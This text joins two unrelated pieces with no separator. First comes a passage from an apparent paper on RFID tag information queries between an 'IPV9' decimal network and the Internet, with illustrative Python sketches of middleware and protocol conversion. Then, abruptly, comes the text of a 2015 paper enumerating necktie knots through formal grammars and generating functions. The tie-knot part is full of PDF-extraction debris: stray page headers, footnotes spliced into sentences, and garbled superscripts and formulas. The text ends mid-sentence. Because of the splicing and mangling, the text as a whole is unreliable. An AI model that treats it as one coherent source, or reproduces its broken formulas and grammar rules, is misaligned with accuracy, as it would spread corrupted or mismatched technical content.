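        self._last_seen[read.tag_id] = read.timestamp
        forward(read)

if __name__ == "__main__":
    mw = ReaderMiddleware()
    app_log = []
    for _ in range(3):  # three raw reads of the same tag in quick succession
        mw.on_read(TagRead("86.21.4.586", "reader-01", time.time()), app_log.append)
    print(len(app_log), "read(s) forwarded to the application system")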
The application system judges the legitimacy of electronic tags according to logic operations, and carries out the corresponding processing and control for different settings, thus realizing the basic functions of an RFID system.

IV. NETWORK ARCHITECTURE BASED ON IPV9 RFID INFORMATION QUERY TECHNOLOGY
RFID information query technology provides the function of querying product-related information through an RFID tag. The information related to RFID tags is stored on an information server and is generally maintained by the manufacturer of the product. In view of the actual use of the Internet, it is necessary to design a network architecture for interconnection between the decimal network and the Internet that meets certain conditions; on this basis, the RFID tag information query service is implemented. The overall design scheme is as follows.

A. Overall design of the network architecture
The architecture of the RFID tag information query service on the Internet is based on the IPV4 and IPV6 protocols: routing adopts IPV4 and IPV6, and resource positioning is completed by the SNS and PSNS servers. The architecture of the electronic tag information location query service on the decimal network is based on the IPV9 protocol and includes the following two ways.
(1) Using routing to locate the information server directly. The route uses the IPV9 protocol without a DNS resolver.
(2) Adopting the parsing service of the application layer with a U-code Resolution Server. D-ONS uses host domain name resolution to provide IPV4, IPV6 and IPV9 addresses, while using the IPV4, IPV6 and IPV9 protocols as routing protocols; resource positioning is done by D-ONS.
The network architecture of the RFID tag information query service comprises the decimal network information query service system and the Internet information query service system. Specifically, the decimal network architecture includes middleware, an information server, a D-ONS server, a DDNS server and an IPV9 direct router. The Internet architecture includes an SNS server, a PSNS server, an information server, a .cn root DNS server and a DDNS server; the .cn root DNS server connects digital domain names and English domain names through domain name resolution forwarding.

B. The key module of the network architecture: the expert module
The expert module is the middleware used between the decimal network and the Internet to realize the interconnection between the two; the data exchange format between them is XML. It includes the following interfaces (a minimal sketch of such a module follows this list):
- RF information query from the decimal network to the Internet discovery architecture: product and service digital identifiers are submitted, and the discovery architecture is asked, through the expert module, to return the storage address or URI of the product and service information.
- RF information query from the Internet to the decimal network discovery architecture: product and service digital identifiers are submitted, and the discovery architecture is asked, through the expert module, to return the storage address or URI of the product and service information.
- RF information query from the decimal network to the Internet discovery architecture: product and service digital identifiers are submitted, and the discovery architecture is asked, through the expert module, to return the product and service information itself.
- RF information query from the Internet to the decimal network discovery architecture: product and service digital identifiers are submitted, and the discovery architecture is asked, through the expert module, to return the product and service information itself.
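As announced above, here is a minimal Python sketch of an expert module exposing the four interfaces just listed, with XML as the exchange format. The class name, method names and the XML layout are assumptions made for illustration; the paper specifies the roles of the interfaces, not their programming form.

# Illustrative sketch only: the four expert-module interfaces listed above,
# exchanging XML requests between the decimal network and the Internet.
import xml.etree.ElementTree as ET

class ExpertModule:
    """Hypothetical middleware bridging the decimal network and the Internet."""

    def _request(self, network: str, identifier: str, want: str) -> str:
        # Build the XML request exchanged between the two systems.
        req = ET.Element("query", network=network, want=want)
        ET.SubElement(req, "identifier").text = identifier
        return ET.tostring(req, encoding="unicode")

    # Decimal network asks the Internet discovery architecture for an address/URI.
    def decimal_to_internet_address(self, identifier: str) -> str:
        return self._request("internet", identifier, "address")

    # Internet asks the decimal network discovery architecture for an address/URI.
    def internet_to_decimal_address(self, identifier: str) -> str:
        return self._request("decimal", identifier, "address")

    # Decimal network asks the Internet discovery architecture for the information itself.
    def decimal_to_internet_info(self, identifier: str) -> str:
        return self._request("internet", identifier, "info")

    # Internet asks the decimal network discovery architecture for the information itself.
    def internet_to_decimal_info(self, identifier: str) -> str:
        return self._request("decimal", identifier, "info")

if __name__ == "__main__":
    print(ExpertModule().decimal_to_internet_address("86.21.4.586"))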
V. RESEARCH ON THE INFORMATION QUERY PROCESS
Based on the above network architecture, the RFID tag information query service based on IPV9 can be implemented in two ways: a D-ONS-based exchange of queries between the decimal network and the Internet, and a direct-routing mode of mutual access between the decimal network information query service system and the Internet information query service system.

A. Exchange query process between the D-ONS-based decimal network and the Internet information query service system
When the related product information is stored on an Internet information server and the label coding format is the IPV9 format, the query process by which the D-ONS-based decimal network accesses the Internet mainly involves the following key modules: the decimal network query server, the expert module, the Internet service middleware, the information server, and the SNS and PSNS servers. The access relationships between these modules are shown in Figure 3.

Figure 3. The process of accessing the Internet from a D-ONS-based decimal network (label reader and query server on the decimal network side; expert module, service middleware, SNS server, PSNS server and information server on the Internet side).

1) The access process can be described as follows (a sketch of the flow follows these steps):
a) RFID readers read the IPV9 identifiers and the product and service identifiers from the electronic tags.
b) The read identifiers and the product and service identifiers are submitted to the query server in the decimal network.
c) The decimal network query server calls the Internet interface of the expert module to access the Internet.
d) The Internet interface of the expert module accesses the middleware of the Internet architecture with the standard identifiers and the product and service identifiers.
e) The service middleware converts the standard identifier into the domain name format and sends it to the SNS server to request the resolution service.
f) The SNS server returns the conversion rules for the PSID domain name, in the form of regular expressions, to the service middleware.
g) The service middleware issues a query request to the PSNS server based on the PSID domain name.
h) The PSNS server returns the NAPTR record containing the address of the product and service information service or of the PSDS.
i) The service middleware returns the results to the expert module, whose decimal network interface returns the NAPTR records with the product and service information service address or the PSDS address to the query server.
j) The query server issues the request and finally obtains the product information returned by the information server.
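The following Python sketch writes the D-ONS-based flow above (steps a to j) as a pipeline of calls. Every function name, the rewrite-rule syntax and the record contents are hypothetical; the paper defines the roles of the components, not their programming interfaces.

# Illustrative sketch only: the D-ONS-based decimal-network-to-Internet query
# flow, with the SNS step returning a regular-expression rewrite rule.
import re

def sns_lookup(standard_domain: str) -> str:
    """Step f: the SNS server returns a domain-conversion rule as a regular expression."""
    # Assumed rule: rewrite "<product>.<service>.example" into a PSID domain.
    return r"^(?P<product>[^.]+)\.(?P<service>[^.]+)\.example$ -> \g<service>.psid.example"

def apply_rule(rule: str, domain: str) -> str:
    """Apply a 'pattern -> replacement' rewrite rule to a domain name."""
    pattern, replacement = [part.strip() for part in rule.split("->")]
    return re.sub(pattern, replacement, domain)

def psns_lookup(psid_domain: str) -> dict:
    """Steps g-h: the PSNS server returns a NAPTR-like record with the server address."""
    return {"type": "NAPTR", "service": psid_domain, "target": "info-server.example"}

def query_product_info(ipv9_identifier: str, product_domain: str) -> str:
    # Steps a-d: reader -> decimal query server -> expert module -> Internet middleware.
    rule = sns_lookup(product_domain)                # step f
    psid_domain = apply_rule(rule, product_domain)   # middleware applies the rule
    record = psns_lookup(psid_domain)                # steps g-h
    # Steps i-j: the address travels back through the expert module, and the
    # query server finally fetches the product information from that address.
    return f"fetched info for {ipv9_identifier} from {record['target']}"

if __name__ == "__main__":
    print(query_product_info("86.21.4.586", "widget.acme.example"))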
When the product-related information is stored on an information server in the decimal network and the label encoding format is the IPV4 or IPV6 format, the D-ONS-based decimal network is accessed from the Internet. The access process involves these key modules: the Internet query server, the expert module, the D-ONS server and the information server. The access process is shown in Figure 4.

Figure 4. The process of the Internet accessing the decimal network based on D-ONS (label reader and query server on the Internet side; expert module, D-ONS resolution server, domain resolution server and information server on the decimal network side).

2) The access process can be described as follows:
a) RF readers read the product and service identifiers from electronic tags encoded in the IPV4 or IPV6 format.
b) The identifier and the product and service identifiers are submitted to the query server.
c) The query server calls the decimal network interface of the expert module between the Internet and the decimal network.
d) The decimal network interface of the expert module sends a request to the D-ONS server of the decimal network architecture to look up, from the identifier and the product and service identifiers, the domain name of the server where the product information is stored.
e) The D-ONS server receives the request and returns the product and service domain name.
f) The information server of the decimal network is queried for the product information.
g) The query server returns the product information.

B. Exchange query process between the direct-routing decimal network information query service system and the Internet information query service system
The processes of mutual access between the direct-routing decimal network information query service system and the Internet information query service system are shown in Figures 5 and 6. They involve the query server, the expert module, the middleware, the information server, the SNS server and the PSNS server. The interconnection of IPV4, IPV6 and IPV9 is realized through protocol conversion: a protocol conversion server is set up, and all data packets are converted into the specified protocols to satisfy data communication between the different protocols.

Figure 5. The access process of a direct-routing decimal network to the Internet (label reader and query server on the decimal network side; expert module with protocol conversion between IPV9 and IPV4/IPV6; middleware, SNS server, PSNS server and information server on the Internet side).

1) The process of searching for product information that is stored on the Internet while the tag encoding format is IPV9 can be described as follows (a sketch of the protocol-conversion step follows these steps):
a) The RF reader reads the IPV9 identifier and the product and service identifiers from the electronic tag.
b) The product and service identifiers are submitted to the query server on the decimal network.
c) The query server calls the Internet interface of the expert module.
d) The Internet interface of the expert module accesses the middleware of the Internet architecture with the product and service identifiers.
e) The Internet middleware delivers the product and service domain names to the SNS server.
f) The SNS server returns the intermediate results to the middleware.
g) The middleware returns the results to the expert module.
h) The expert module requests the product information from the information server according to the address information obtained.
i) The expert module returns the product information to the query server of the decimal network, completing the product information query.
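To illustrate the protocol-conversion step in the direct-routing flow above, here is a toy Python sketch that rewrites a query "packet" so it can cross from the IPV9 side to the IPV4/IPV6 side. The packet layout and the address mapping are invented for the example; the paper only states that the conversion server translates addresses, messages and headers between the protocols.

# Illustrative sketch only: a toy protocol-conversion step for direct routing.

def convert_packet(packet: dict, target_protocol: str, address_map: dict) -> dict:
    """Rewrite a packet's protocol and addresses so it can cross networks."""
    converted = dict(packet)
    converted["protocol"] = target_protocol
    # Translate source and destination addresses using the mapping table kept
    # by the (hypothetical) protocol conversion server.
    converted["src"] = address_map.get(packet["src"], packet["src"])
    converted["dst"] = address_map.get(packet["dst"], packet["dst"])
    return converted

if __name__ == "__main__":
    # Hypothetical mapping between IPV9-style identifiers and IPV4 hosts.
    address_map = {"86.21.4.586": "203.0.113.10", "info.server.example": "203.0.113.20"}
    ipv9_query = {
        "protocol": "IPV9",
        "src": "86.21.4.586",
        "dst": "info.server.example",
        "payload": "GET product-info?id=12345",
    }
    print(convert_packet(ipv9_query, "IPV4", address_map))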
In the direct-routing mode, if the product's RF tags are encoded with the IPV4 or IPV6 protocol and the product-related information is stored on a server in the decimal network, the query process involves the IPV9 router, the information server, the expert module and the query server.

Figure 6. The access process from the Internet to the decimal network under direct routing (label reader and query server on the Internet side; expert module with protocol conversion between IPV4/IPV6 and IPV9; IPV9 direct-routing server and information server on the decimal network side).

2) The access process can be described as follows:
a) RF readers read the IPV4 or IPV6 identifiers and the product and service identifiers from the electronic tags.
b) The product and service identifiers are submitted to the query server over the Internet.
c) The query server calls the decimal network interface of the expert module.
d) The decimal network interface of the expert module accesses the IPV9 router of the decimal network architecture with the product and service identifiers.
e) The IPV9 router converts the product and service digital identifiers to the IP address of the product information server.
f) The IPV9 router accesses the information server and requests the product information.
g) The IPV9 router returns the product information to the Internet user via the expert module.

In the above process, the expert module between the two network systems translates and converts the data formats of the two systems; the protocol conversion module can translate the IP address, the message and the header.

VI. CONCLUSION
This paper proposes two kinds of information query exchange services between the decimal network and the Internet, to solve the problem that the encoding format of radio frequency tags is not uniform with the network protocol format of the product information server. Experimental results show that both methods can provide an efficient RF information query service.
More ties than we thought

Dan Hirsch1, Ingemar Markström2, Meredith L. Patterson1, Anders Sandberg3 and Mikael Vejdemo-Johansson2,4,5
1 Upstanding Hackers Inc.
2 KTH Royal Institute of Technology, Stockholm, Sweden
3 Oxford University, UK
4 Jožef Štefan Institute, Ljubljana, Slovenia
5 Institute for Mathematics and its Applications, Minneapolis, USA

Submitted 13 February 2015. Accepted 6 May 2015. Published 27 May 2015.
Corresponding author: Mikael Vejdemo-Johansson, mvj@kth.se. Academic editor: Anne Bergeron.
DOI 10.7717/peerj-cs.2. Copyright 2015 Hirsch et al. Distributed under Creative Commons CC-BY 4.0. OPEN ACCESS.

ABSTRACT
We extend the existing enumeration of neck tie-knots to include tie-knots with a textured front, tied with the narrow end of a tie. These tie-knots have gained popularity in recent years, based on reconstructions of a costume detail from The Matrix Reloaded, and are explicitly ruled out in the enumeration by Fink & Mao (2000). We show that the relaxed tie-knot description language that comprehensively describes these extended tie-knot classes is context free. It has a regular sub-language that covers all the knots that originally inspired the work. From the full language, we enumerate 266,682 distinct tie-knots that seem tie-able with a normal neck-tie. Out of these 266,682, we also enumerate 24,882 tie-knots that belong to the regular sub-language.

Subjects: Algorithms and Analysis of Algorithms, Computational Linguistics, Theory and Formal Methods
Keywords: Necktie knots, Formal language, Automata, Chomsky hierarchy, Generating functions

INTRODUCTION
There are several different ways to tie a necktie (Fig. 1). Classically, knots such as the four-in-hand, the half windsor and the full windsor have commonly been taught to new tie-wearers. In a sequence of papers and a book, Fink & Mao (2001), Fink & Mao (2000) and Fink & Mao (1999) defined a formal language for describing tie-knots, encoding the topology and geometry of the knot tying process into the formal language, and then used this language to enumerate all tie-knots that could reasonably be tied with a normal-sized necktie. The enumeration of Fink and Mao crucially depends on dictating a particular finishing sequence for tie-knots: a finishing sequence that forces the front of the knot—the façade—to be a flat stretch of fabric. With this assumption in place, Fink and Mao produce a list of 85 distinct tie-knots, and determine several novel knots that extend the previously commonly known list of tie-knots.
In recent years, however, interest has been growing for a new approach to tie-knots. In The matrix reloaded (Wachowski et al., 2003), the character of "The Merovingian" has a sequence of particularly fancy tie-knots. Attempts by fans of the movie to recreate the tie-knots from the Merovingian have led to a collection of new tie-knot inventions, all of which rely on tying the tie with the thin end of the tie—the thin blade.
Doing this allows for a knot with textures or stylings of the front of the knot, producing symmetric and pleasing patterns.

Figure 1 Some specific tie-knot examples. Top row from left: the Trinity (L-110.4), the Eldredge (L-373.2) and the Balthus (C-63.0, the largest knot listed by Fink and Mao). Bottom row, randomly drawn knots. From left: L-81.0, L-625.0, R-353.0.

Knorr (2010) gives the history of the development of novel tie-knots. It starts out in 2003 when the edeity knot is published as a PDF tutorial. Over the subsequent 7 years, more and more enthusiasts involve themselves, publish new approximations of the Merovingian tie-knot as PDF files or YouTube videos. By 2009, the new tie-knots are featured on the website Lifehacker and go viral.
In this paper, we present a radical simplification of the formal language proposed by Fink and Mao, together with an analysis of the asymptotic complexity class of the tie-knots language. We produce a novel enumeration of necktie-knots tied with the thin blade, and compare it to the results of Fink and Mao.

Formal languages
The work in this paper relies heavily on the language of formal languages, as used in theoretical computer science and in mathematical linguistics. For a comprehensive reference, we recommend the textbook by Sipser (2006).
Recall that given a finite set L called an alphabet, the set of all sequences of any length of items drawn (with replacement) from L is denoted by L∗. A formal language on the alphabet L is some subset A of L∗. The complexity of the automaton required to determine whether a sequence is an element of A places A in one of several complexity classes. Languages that are described by finite state automata are regular; languages that require a pushdown automaton are context free; languages that require a linear bounded automaton are context sensitive; and languages that require a full Turing machine to determine are called recursively enumerable. This sequence builds an increasing hierarchy of expressibility and computational complexity for syntactic rules for strings of some arbitrary sort of tokens.

Figure 2 Left/Center/Right. The parts of a necktie, and the division of the wearer's torso with the regions (Left, Center, Right) and the winding directions (Turnwise, Widdershins) marked out for reference.

One way to describe a language is to give a grammar—a set of production rules that decompose some form of abstract tokens into sequences of abstract or concrete tokens, ending with a sequence of elements in some alphabet. The standard notation for such grammars is the Backus–Naur form, which uses ::= to denote the production rules and ⟨some name⟩ to denote the abstract tokens. Further common symbols are ∗, the Kleene star, that denotes an arbitrary number of repetitions of the previous token (or group in brackets), and |, denoting a choice of one of the adjoining options.
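To make the Backus–Naur notation concrete before it is used below, here is a minimal Python sketch that expands strings from a toy BNF-style grammar by repeatedly rewriting nonterminals. The grammar and all names are illustrative only; this is not the tie-knot grammar developed later in the paper.

# Illustrative sketch only: random expansion of a toy BNF-style grammar.
# <word> ::= <letter> | <letter> <word>      (one or more letters)
# <letter> ::= T | W
import random

toy_grammar = {
    "<word>": [["<letter>"], ["<letter>", "<word>"]],
    "<letter>": [["T"], ["W"]],
}

def expand(symbol: str, grammar: dict, rng: random.Random) -> str:
    """Expand a symbol: nonterminals are rewritten by a randomly chosen rule."""
    if symbol not in grammar:          # terminal symbol: emit it as-is
        return symbol
    production = rng.choice(grammar[symbol])
    return "".join(expand(part, grammar, rng) for part in production)

if __name__ == "__main__":
    rng = random.Random(0)
    print([expand("<word>", toy_grammar, rng) for _ in range(5)])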
THE ANATOMY OF A NECKTIE In the following, we will often refer to various parts and constructions with a necktie. We call the ends of a necktie blades, and distinguish between the broad blade and the thin blade1—see Fig. 2 for these names. The tie-knot can be divided up into a body, consisting of 1 There are neckties without a width difference between the ends. We ignore this distinction for this paper. all the twists and turns that are not directly visible in the final knot, and a façade, consisting of the parts of the tie actually visible in the end. In Fig. 3 we demonstrate this distinction. The body builds up the overall shape of the tie-knot, while the façade gives texture to the front of the knot. The enumeration of Fink and Mao only considers knots with trivial façades, while these later inventions all consider more interesting façades. As a knot is in place around a wearer, the Y-shape of the tie divides the torso into 3 regions: Left, Center and Right—as shown to the right in Fig. 2. A tie-knot has to be tied by winding and tucking one of the two blades around the other: if both blades are active, then the tie can no longer be adjusted in place for a comfortable fit. We shall refer to the blade used in tying the knot as the leading blade or the active blade. Each time the active blade is moved across the tie-knot—in front or in back—we call the part of the tie laid on top of the knot a bow. A LANGUAGE FOR TIE-KNOTS Fink & Mao (2000) observe that once the first crossing has been made, the wrapping sequence of a classical tie-knot is completely decided by the sequence of regions into which the broad blade is moved. Adorning the region specifications with a direction—is the tie moving away from the wearer or towards the wearer—they establish a formal alphabet for describing tie-knots with 7 symbols. We reproduce their construction here, using U for the Hirsch et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.2 3/15 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.2 Figure 3 Different examples of tie knots. Left, a 4-in-hand; middle, a double windsor; right a trinity. The 4-in-hand and double windsor share the flat façade but have different bodies producing different shapes. The trinity has a completely different façade, produced by a different wind and tuck pattern. move to tuck the blade U nder the tie itself.2 The notation proposed by Fink & Mao (2000) 2 Fink and Mao used T for Tuck. interprets repetitions U k of U as tucking the blade k bows under the top. It turns out that the complexity analysis is far simpler if we instead write U k for tucking the blade under the bow that was produced 2k windings ago. This produces a language on the alphabet: {L⊗,L⊙,C⊗,C⊙,R⊗,R⊙,U} They then introduce relations and restrictions on these symbols: T ie1 No region (L,C,R) shall repeat: after an L only C or R are valid next regions. U moves do not influence this. T ie2 No direction (⊙—out of the paper, ⊗—in towards the paper) shall repeat: after an outwards move, the next one must go inwards. U moves do not influence this. T ie3 Tucks (U ) are valid after an outward move. T ie4 A tie-knot can end only on one of C⊗,C⊙ or U . In fact, almost all classical knots end on U .3 3 The exemption here being the Onassis style knot, favored by the eponymous shipping magnate, where after a classical knot the broad blade is brought up with a C⊙ move to fall in front of the knot, hiding the knot completely. T ie5 A k-fold tuck U k is only valid after at least 2k preceding moves. 
Fink & Mao (2000) do not pay much attention to the conditions on k-fold tucks, since these show up in their enumeration as stylistic variations, exclusively at the end of a knot. This collection of rules allow us to drastically shrink the tie language, both in alphabet and axioms. Fink & Mao are careful to annotate whether tie-knot moves go outwards or inwards at any given point. We note that the inwards/outwards distinction follows as a direct consequence of axioms T ie2, T ie3 and T ie4. Since non-tuck moves must alternate between inwards and outwards, and the last non-tuck move must be outwards, the orientation of any sequence of moves follows by backtracking from the end of the string. Hence, when faced with a non-annotated string like RCLCRCLCRCLRURCLU Hirsch et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.2 4/15 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.2 we can immediately trace from the tail of the knot string: the last move before the final tuck must be outwards, so that L must be a L⊙. So it must be preceded by R⊙C⊗. Tracing backwards, we can specify the entire string above to R⊗C⊙L⊗C⊙R⊗C⊙L⊗C⊙R⊗C⊙L⊗R⊙UC⊗R⊙C⊗L⊙U Next, the axiom T ie1 means that a sequence will not contain either of LU∗L,CU∗C,RU∗R as subsequences.4 Hence, the listing of regions is less important than the direction of 4 Recall that the Kleene star F∗ is used to denote sequences of 0 or more repetitions of the string F. transition: any valid transition is going to go either clockwise or counterclockwise.5 5 Say, as seen on the mirror image. Changing this convention does not change the count, as long as the change is consequently done. Writing T for clockwise6 and W for counterclockwise,7 we can give a strongly reduced 6 T for Turnwise. 7 W for Widdershins. tie language on the alphabet T, W, U. To completely determine a tie-knot, the sequence needs a starting state: an annotation on whether the first crossing of a tie-knot goes across to the right or to the left. In such a sequence, a U instruction must be followed by either T or W dictating which direction the winding continues after the tuck, unless it is the last move of the tie: in this case, the blade is assumed to continue straight ahead—down in front for most broad-blade tie-knots, tucked in under the collar for most thin-blade knots. The position of the leading blade after a sequence of W/T windings is a direct result of #W − #T(mod 3). This observation allows us to gain control over several conditions determining whether a distribution of U symbols over a sequence of W/T produces a physically viable tie-knot. Theorem 1. A position in a winding sequence is valid for a k-fold tuck if the sub-sequence of the last 2k W or T symbols is such that either 1. starts with W and satisfies #W − #T = 2 (mod 3) 2. starts with T and satisfies #T − #W = 2 (mod 3). Proof. The initial symbol produces the bow under which the tuck will go. If the initial symbol goes, say, from R to L, then the tuck move needs to come from C in order to go under the bow. In general, a tuck needs to come from the one region not involved in the covering bow. Every other bow goes in front of the knot, and the others go behind the knot. Hence, there are 2k − 1 additional winding symbols until the active blade returns to the right side of the knot. During these 2k − 1 symbols, we need to transition one more step around the sequence of regions. The transitions W and T are generator and inverse for the cyclic group of order 3, concluding the proof. 
� It is worth noticing here that a particular point along a winding can be simultaneously valid for both a k-fold and an m-fold tuck for k ≠ m. One example would be in the winding string TWTT: ending with TT, it is a valid site for a 1-fold tuck producing TWTTU, and since TWTT starts with T and has 2 more T than W, it is also a valid site for a 2-fold tuck producing TWTTUU. We will revisit this example below, in ‘Recursive tucks.’ We may notice that with the usual physical constraints on a tie—where we have experimentally established that broad blade ties tend to be bounded by 9 moves, and thin blade ties by 15 moves, we can expect that no meaningful tuck deeper than 7 will ever Hirsch et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.2 5/15 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.2 be relevant; 4 for the broad blade ties. The bound of 4 is achieved in the enumeration by Fink & Mao (1999). In our enumeration, we will for the sake of comfort focus on ties up to 13 moves. LANGUAGE COMPLEXITY In this section, we examine the complexity features of the tie-knot language. Due to the constraints we have already observed on the cardinality of W and T, we will define a grammar for this language. We will write this grammar with a Backus–Naur form. Although in practice it is only possible to realise finite strings in the tie-knot language due to the physical properties of fabric, we assume an arbitrarily long (but finite), infinitely thin tie. Single-depth tucks The classical Fink and Mao system has a regular grammar, given by ⟨tie⟩ ::= L⟨L⟩ ⟨lastR⟩ ::= L⟨lastL⟩ | C⟨lastC⟩ | LCU ⟨lastL⟩ ::= R⟨lastR⟩ | C⟨lastC⟩ | RCU ⟨lastC⟩ ::= L⟨lastL⟩ | R⟨lastR⟩ We use the symbol ⟨lastR⟩ to denote the rule that describes what can happen when the last move seen was an R. Hence, at any step in the grammar, some tie knot symbol is emitted, and the grammar continues from the state that symbol was the last symbol emitted. The above grammar works well if the only tucks to appear are at the end. For intermediate tucks, and to avoid tucks to be placed at the back of the knot (obeying T ie3), we would need to keep track of winding parity: tucks are only valid an even number of winding steps from the end. We can describe this with a regular grammar. For the full tie-knot language, the grammar will end up context-free, as we will see in ‘Recursive tucks.’ ⟨tie⟩ ::= ⟨prefix⟩(⟨pair⟩ | ⟨tuck⟩) ∗ ⟨tuck⟩ ⟨prefix⟩ ::= T | W | ϵ ⟨pair⟩ ::= (T|W)(T|W) ⟨tuck⟩ ::= TTU | WWU The distribution of T and W varies by type of knot: for classical knots, #W − #T = 2 (mod 3); for modern knots that tuck to the right, #W − #T = 1 (mod 3); and for modern knots that tuck to the left, #W − #T = 0 (mod 3). This grammar does not discriminate between these three sub-classes. In order to track these sub-classes, the RLC-notation is easier. In order to rebuild this grammar to one based on the RLC-notation, note that from L a T takes us to C and a W takes us to R. So from a ⟨lastT⟩ residing at L, we have the options: W to Hirsch et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.2 6/15 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.2 R, T to C, or TU to C. In particular, there is a ⟨lastT⟩ at L if we arrived from R. Hence, the TU option can be seen as being a TTU option executing from the preceding R state. There is thus, at any given position in the tie sequence, the options of proceeding with a T or a W, or to proceed with one of TTU or WWU. 
In the latter two cases, we can also accept the string. Starting at L, these options take us—in order—to C, to R, to CRU and to RCU respectively. This observation extends by symmetry to all stages, giving the grammar below. ⟨lastR⟩ ::= LR⟨lastR⟩ | CR⟨lastR⟩ | LC⟨lastC⟩ | CL⟨lastL⟩ | LCU[⟨lastC⟩] | CLU[⟨lastL⟩] ⟨lastL⟩ ::= RL⟨lastL⟩ | CL⟨lastL⟩ | RC⟨lastC⟩ | CR⟨lastR⟩ | RCU[⟨lastC⟩] | CRU[⟨lastR⟩] ⟨lastC⟩ ::= LC⟨lastC⟩ | RC⟨lastC⟩ | LR⟨lastR⟩ | RL⟨lastL⟩ | LRU[⟨lastR⟩] | RLU[⟨lastL⟩] ⟨tie⟩ ::= L(⟨lastL⟩ | R⟨lastR⟩ | C⟨lastC⟩) By excluding some the exit rules, this allows us to enumerate novel tie-knots with a specific ending direction, which will be of interest later on. Recursive tucks We can write a context-free grammar for the arbitrary depth tuck tie-knots. ⟨tie⟩ ::= ⟨prefix⟩(⟨pair⟩ | ⟨tuck⟩) ∗ ⟨tuck⟩ ⟨prefix⟩ ::= T | W | ϵ ⟨pair⟩ ::= (T|W)(T|W) ⟨tuck⟩ ::= ⟨ttuck2⟩ | ⟨wtuck2⟩ ⟨ttuck2⟩ ::= TT⟨w0⟩U | TW⟨w1⟩U ⟨wtuck2⟩ ::= WW⟨w0⟩U | WT⟨w2⟩U ⟨w0⟩ ::= WW⟨w1⟩U | WT⟨w0⟩U | TW⟨w0⟩U|TT⟨w2⟩U | ⟨ttuck2⟩’⟨w2⟩U | ⟨wtuck2⟩’⟨w1⟩U | ϵ ⟨w1⟩ ::= WW⟨w2⟩U | WT⟨w1⟩U | TW⟨w1⟩U|TT⟨w0⟩U | ⟨ttuck2⟩’⟨w0⟩U | ⟨wtuck2⟩’⟨w2⟩U ⟨w2⟩ ::= WW⟨w0⟩U | WT⟨w2⟩U | TW⟨w2⟩U|TT⟨w1⟩U | ⟨ttuck2⟩’⟨w1⟩U | ⟨wtuck2⟩’⟨w0⟩U Note that the validity of a tuck depends only on the count of T and W in the entire sequence comprising the tuck, and not the validity of any tucks recursively embedded into it. For instance, TWTT is a valid depth-2-tuckable sequence, as is its embedded depth-1-tuckable sequence TT. However, TTWT is also a valid depth-2-tuckable sequence, even though WT is not a valid depth-1-tuckable sequence. We introduce the symbol ’ to delineate different tucks that may come in immediate sequence, such as happens in the tie knot TWTTU’UU. Hirsch et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.2 7/15 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.2 Classification of the tie-knot language If we limit our attention to only the single-depth tie-knots described in ‘Single-depth tucks,’ then the grammar is regular, proving that this tie language is a regular language and can be described by a finite automaton. In particular this implies that the tie-knot language proposed by Fink & Mao (1999) is regular. In fact, an automaton accepting these tie-knots is given by: After the prefix, execution originates at the middle node, but has to go outside and return before the machine will accept input. This maintains the even length conditions required by T ie3. As for the deeper tucked language in ‘Recursive tucks’, the grammar we gave shows it to be at most context-free. Whether it is exactly context-free requires us to exclude the existence of a regular grammar. Theorem 2. The deeper tucked language is context-free. Proof. Our grammar in ‘Recursive tucks’ already shows that the language for deeper tucked tie-knots is either regular or context-free: it produces tie-knot strings with only single non-terminal symbols to the left of each production rule. It remains to show that this language cannot be regular. To do this, we use the pumping lemma for regular languages. Recall that the pumping lemma states that for every regular language there is a constant p such that for any word w of length at least p, there is a decomposition w = xyz such that |xy| ≤ p, |y| ≥ 1 and xyiz is a valid string for all i > 0. Since the reverse of any regular language is also regular, the pumping lemma has an alternative statement that requires |yz| ≤ p instead. We shall be using this next. Suppose there is such a p. 
Consider the tie-knot TTW6q−2U3q for some q > p/3. Any decomposition such that |yz| ≤ p will be such that y and z consist of only U symbols. In particular y consists of only U symbols. Hence, for sufficiently large values of i, there are too few preceding T/W-symbols to admit that tuck depth. Hence the language is not regular. � Hirsch et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.2 8/15 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.2 ENUMERATION We can cut down the enumeration work by using some apparent symmetries. Without loss of generality, we can assume that a tie-knot starts by putting the active blade in region R: any knot starting in the region L is the mirror image of a knot that starts in R and swaps all W to T and vice versa. Generating functions Generating functions have proven a powerful method for enumerative combinatorics. One very good overview of the field is provided by the textbooks by Stanley (1997) and Stanley (1999). Their relevance to formal languages is based on a paper by Chomsky & Schützenberger (1959) that studied context-free grammars using formal power series. More details will appear in the (yet unpublished) Handbook AutoMathA (Gruber, Lee & Shallit, 2012). A generating function for a series an of numbers is a formal power series A(z) = ∞ j=0 ajz j such that the coefficient of the degree k term is precisely ak. Where ak and bk are counts of “things of size k” of type a or b respectively, the sum of the corresponding generating functions is the count of “things of size k” across both categories. If gluing some thing of type a with size j to some thing of type b with size k produces a thing of size j + k, then the product of the generating functions measures the counts of things you get by gluing things together between the two types. For our necktie-knot grammars, the sizes are the winding lengths of the ties, and it is clearly the case that adding a new symbol extends the size (thus is a multiplication action), and taking either one or another rule extends the items considered (thus is an additive action). The Maple8 package combstruct has built-in functions for computing a generating 8 Maple is a trademark of Waterloo Maple Inc. The computations of generating functions in this paper were performed by using Maple. function from a grammar specification. Using this, and the grammars we state in ‘Single-depth tucks,’ we are able to compute generating functions for both the winding counts and the necktie counts for both Fink and Mao’s setting and the single-depth tuck setting. • The generating function for Fink and Mao necktie-knots is z3 (1 + z)(1 − 2z) = z3 + z4 + 3z5 + 5z6 + 11z7 + 21z8 + 43z9 + O(z10). • The generating function for single tuck necktie-knots is 2z3(2z + 1) 1 − 6z2 = 2z3 + 4z4 + 12z5 + 24z6 + 72z7 + 144z8 + 432z9 + 864z10 + 2,592z11 + 5,184z12 + 15,552z13 + O(z14). • By removing final states from the BNF grammar, we can compute corresponding generating functions for each of the final tuck destinations. For an R-final tuck, we remove all final states except for CRU and LRU, making the non-terminal symbol 